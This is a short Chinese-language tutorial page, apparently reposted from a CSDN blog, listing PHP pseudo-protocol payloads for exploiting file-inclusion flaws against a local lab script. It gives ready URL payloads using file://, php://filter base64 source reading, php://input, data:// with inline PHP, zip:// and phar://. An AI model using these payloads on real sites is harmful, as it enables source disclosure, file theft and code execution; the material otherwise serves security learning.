当前位置: 首页> 房产> 建材 > 文件包含PHP伪协议利用方法

文件包含PHP伪协议利用方法

时间:2025/7/11 0:53:25来源:https://blog.csdn.net/shw_yzh/article/details/141868895 浏览次数:0次

1.file://协议

使⽤: file:// ⽂件的绝对路径和⽂件名
2.php?cmd=file://D:\phpstudy_pro\WWW\123.txt

2.php://filter协议

⽤途:常⽤于读取⽂件 / 源码
2.php?cmd=php://filter/read=convert.base64-encode/resource=1.php

3.php://input协议

步骤一:2.php?cmd=php://input抓包

步骤二:右键修改请求方法,修改数据包

步骤三:放行访问

4.data:// 协议

⽤途:数据( RFC2397
2.php?cmd=data:text/plain,<?php phpinfo();?>

5.zip://协议

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)
2.php?cmd=zip://123.zip%23123.txt

6.phar://协议

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)
2.php?cmd=phar://123.zip/123.txt

关键字:文件包含PHP伪协议利用方法

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: